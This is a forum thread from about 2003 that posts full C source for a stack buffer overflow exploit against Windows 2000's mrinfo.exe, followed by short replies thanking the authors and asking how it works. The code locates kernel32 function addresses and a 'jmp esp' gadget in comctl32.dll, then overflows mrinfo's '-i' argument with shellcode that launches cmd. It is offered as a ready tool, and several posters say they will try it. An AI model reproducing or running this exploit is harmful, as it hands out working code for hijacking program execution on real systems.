Full Version: Mrinfo.exe : Compiled
AciD-FluX
here is the code:
/**********************************************************************/
/* [*] EDUCATIONAL PURPOSE ONLY DOESN'T GIVE ANY ADMIN RIGHTS [*] */
/**********************************************************************/
/** mrinfo.exe exploit for win2k only. On winXP the process faults when **/
/** it jumps to the "jmp esp" address found in comctl32.dll. That address **/
/** is taken from THIS process, so it is only valid if mrinfo.exe maps  **/
/** the same comctl32.dll at the same base; presumably it does not on XP **/
/** (different DLL set / load address), hence the exception.            **/
/**********************************************************************/
/******************** coded by Scurt && kralor ************************/
/*********************** comments by kralor ***************************/
/******************** http://www.coromputer.net ***********************/
/*********************** undernet #coromputer *************************/
/**********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <conio.h>
#include <windows.h>
#define RET_DLL "comctl32.dll"
#define EXE "mrinfo.exe"
/***********************************************************************/
/**** int hardcore(char *buffer, char *lib, char *function, int pos) ***/
/***********************************************************************/
/* Function that puts the offset of a function from */
/* a dll into a buffer at the desired place. */
/***********************************************************************/
/* by kralor */
/***********************************************************************/
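/*
 * Resolve `function` in `library` and write its address, in native byte
 * order, into buffer[pos..pos+3].
 *
 * buffer   - shellcode buffer to patch; the caller guarantees that at
 *            least pos+4 bytes exist
 * library  - DLL name handed to LoadLibrary (e.g. "kernel32.dll")
 * function - exported symbol name handed to GetProcAddress
 * pos      - byte offset of the 4-byte placeholder to overwrite
 *
 * Returns 0 on success, -1 if the DLL cannot be loaded, -2 if the export
 * does not exist, -3 if the arguments are unusable (NULL buffer, negative
 * offset) or the function address is not exactly 4 bytes wide.
 *
 * The library is deliberately not released: the resolved address is only
 * meaningful while the DLL stays mapped at the same base.
 */
int hardcore(char *buffer, char *library, char *function, int pos)
{
    HMODULE llib;
    FARPROC pfunc;

    if (!buffer || pos < 0)
        return -3;

    llib = LoadLibrary(library);
    if (!llib)
        return -1;

    pfunc = GetProcAddress(llib, function);
    if (!pfunc)
        return -2;

    /* The shellcode reserves exactly 4 bytes (mov eax, imm32) for the
     * address, so refuse to silently truncate a wider pointer. */
    if (sizeof pfunc != 4)
        return -3;

    memcpy(buffer + pos, &pfunc, 4);
    return 0;
}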
/***********************************************************************/
/**** char *scan_dll(char *lib) ***/
/***********************************************************************/
/* Function that scans a dll looking for the famous 2 opcodes */
/* jmp esp (0xff && 0xe4) and returns the offset */
/***********************************************************************/
/* by Scurt */
/***********************************************************************/
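/*
 * Locate the first "jmp esp" (FF E4) byte pair inside the mapped image of
 * `lib` and return its address as 4 big-endian bytes in a malloc'd buffer
 * (ret[0] is the most significant byte; main() reverses the order when it
 * emits the little-endian return address). The caller owns the buffer.
 *
 * Returns NULL if the DLL cannot be loaded, its PE headers are not
 * recognisable, no FF E4 pair exists inside the image, or malloc fails.
 *
 * The scan is bounded by OptionalHeader.SizeOfImage; the previous version
 * walked memory with no upper limit and would read past the mapping (and
 * crash) on a DLL that does not contain the byte pair. The address is
 * truncated to 32 bits, which is all the 4-byte slot can carry.
 */
char *scan_dll(char *lib)
{
    HMODULE mod;
    BYTE *base;
    IMAGE_DOS_HEADER *dos;
    IMAGE_NT_HEADERS *nt;
    DWORD image_size;
    DWORD i;
    uintptr_t addr;
    char *ret;

    mod = LoadLibrary(lib);
    if (!mod)
        return NULL;
    base = (BYTE *)mod;

    /* An HMODULE is the image base, so the DOS and NT headers start there. */
    dos = (IMAGE_DOS_HEADER *)base;
    if (dos->e_magic != IMAGE_DOS_SIGNATURE || dos->e_lfanew <= 0)
        return NULL;
    nt = (IMAGE_NT_HEADERS *)(base + dos->e_lfanew);
    if (nt->Signature != IMAGE_NT_SIGNATURE)
        return NULL;

    image_size = nt->OptionalHeader.SizeOfImage;
    if (image_size < 2)
        return NULL;

    /* FF E4 == jmp esp (FF D4 == call esp would serve equally well). */
    for (i = 0; i + 1 < image_size; i++) {
        if (base[i] == 0xff && base[i + 1] == 0xe4)
            break;
    }
    if (i + 1 >= image_size)
        return NULL;

    ret = malloc(4);
    if (!ret)
        return NULL;

    addr = (uintptr_t)(base + i);
    ret[0] = (char)((addr >> 24) & 0xff);
    ret[1] = (char)((addr >> 16) & 0xff);
    ret[2] = (char)((addr >> 8) & 0xff);
    ret[3] = (char)(addr & 0xff);
    return ret;
}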
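/*
 * Build the mrinfo.exe command line
 *     EXE -i <56 filler bytes><4-byte return address><shellcode>
 * and hand it to system(). The filler overruns mrinfo's "-i" argument
 * buffer so the saved return address is replaced with a "jmp esp" found
 * in RET_DLL, which lands execution on the shellcode that follows.
 *
 * Returns 0 after launching mrinfo, -1 if a kernel32 export cannot be
 * resolved, 1 if no usable jmp esp exists or the command line cannot be
 * built safely.
 *
 * Win2k only (see the file header); XP raises an exception at the jump.
 */
int main(void)
{
    char *ret;
    char buffer[128];
    HMODULE mod;
    size_t sc_len;
    size_t needed;
    /*
     * Position-independent stub equivalent to
     *     WinExec("cmd", SW_SHOW);   (SW_SHOW == 5)
     *     ExitProcess(0x69);
     * The two 0x69696969 immediates at byte offsets 24 and 33 are
     * overwritten by hardcore() with the real kernel32 addresses.
     */
    char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\xEB\x14"              /* jmp there                       */
        /* here:                                                    */
        "\x58"                  /* pop eax        ; eax = &"cmd"   */
        "\x6A\x05"              /* push 5         ; SW_SHOW        */
        "\x50"                  /* push eax       ; lpCmdLine      */
        "\xB8\x69\x69\x69\x69"  /* mov eax, <WinExec>      @24     */
        "\xFF\xD0"              /* call eax                        */
        "\x6A\x69"              /* push 0x69      ; exit code      */
        "\xB8\x69\x69\x69\x69"  /* mov eax, <ExitProcess>  @33     */
        "\xFF\xD0"              /* call eax                        */
        /* there:                                                   */
        "\xE8\xEB\xFF\xFF\xFF"  /* call here      ; pushes &"cmd"  */
        "\x63\x6D\x64";         /* "cmd"                           */

    printf("[*] Getting WinExec && ExitProcess addresses ...");
    if (hardcore(shellcode, "kernel32.dll", "WinExec", 24)) {
        printf("error: unable to find WinExec function ...\r\n");
        return -1;
    }
    if (hardcore(shellcode, "kernel32.dll", "ExitProcess", 33)) {
        printf("error: unable to find ExitProcess function ...\r\n");
        return -1;
    }
    printf("Done\r\n");

    /* kernel32 is always mapped, so a handle lookup is enough here and
     * avoids bumping its reference count for a diagnostic print. */
    mod = GetModuleHandle("kernel32.dll");
    if (mod) {
        printf("WinExec : 0x%lx\r\n",
               (unsigned long)(uintptr_t)GetProcAddress(mod, "WinExec"));
        printf("ExitProcess: 0x%lx\r\n",
               (unsigned long)(uintptr_t)GetProcAddress(mod, "ExitProcess"));
    }

    /* The payload travels through a C string on the command line, so an
     * embedded NUL (from a patched address) would truncate it silently. */
    sc_len = sizeof shellcode - 1;
    if (memchr(shellcode, 0, sc_len)) {
        printf("error: patched shellcode contains a NUL byte\r\n");
        return 1;
    }

    printf("[*] Searching 'jmp esp' opcodes in %s ...", RET_DLL);
    ret = scan_dll(RET_DLL);
    if (!ret) {
        printf("error: unable to find 'jmp esp' opcodes in %s\r\n", RET_DLL);
        return 1;
    }
    printf("Done\r\n");
    /* %02x: a byte below 0x10 must not shorten the printed address. */
    printf("jmp esp : 0x%02x%02x%02x%02x\r\n",
           (unsigned char)ret[0], (unsigned char)ret[1],
           (unsigned char)ret[2], (unsigned char)ret[3]);
    if (memchr(ret, 0, 4)) {
        printf("error: jmp esp address contains a NUL byte, cannot pass it on the command line\r\n");
        free(ret);
        return 1;
    }

    /* EXE + " -i " + 56 filler bytes + 4 address bytes + shellcode + NUL
     * must fit; the original sprintf had no check at all. */
    needed = strlen(EXE) + 4 + 56 + 4 + sc_len;
    if (needed >= sizeof buffer) {
        printf("error: command line (%u bytes) does not fit in %u bytes\r\n",
               (unsigned)needed, (unsigned)sizeof buffer);
        free(ret);
        return 1;
    }

    /* The 4 address bytes go out least-significant first (little-endian);
     * the shellcode then sits where esp points after the overwritten ret. */
    sprintf(buffer,
            "%s -i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%s",
            EXE, ret[3], ret[2], ret[1], ret[0], shellcode);
    free(ret);

    printf("[*] Executing shellcode through %s ...", EXE);
    /* system() routes the line through cmd.exe: any shell metacharacter
     * among the payload bytes is interpreted before mrinfo sees it. */
    system(buffer);
    printf("Done\r\n");
    Sleep(1000);
    return 0;
}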
ducky
can u plz explain what it does? laugh.gif plz plz...

Cuz i dunno lol
virus
QUOTE (ducky @ Sep 11 2003, 10:41 PM)
can u plz explain what it does? laugh.gif plz plz...

Cuz i dunno lol

then you are not supposed to be here smile.gif
Steffan
THX. for this nice one....

C'ya
][no0b][
thx m8n wink.gif

i will try ...
KoNh
^^ not any use for kiddies ^^ hmm that binary is the debug version
isn't it ^^ mine is 40kb release version ... btw nice way to crash mrinfo on XP ^^
jak3c
yes i will test it this is a great tools! thanks for sharing biggrin.gif
CraZy_A
ok for what you need compiled version? it doesnt do anything... yet...
and yeah it preety much bangs up winxp

but more info please: what vulnerability does this code exploit, and why is comctl32.dll used for the return address?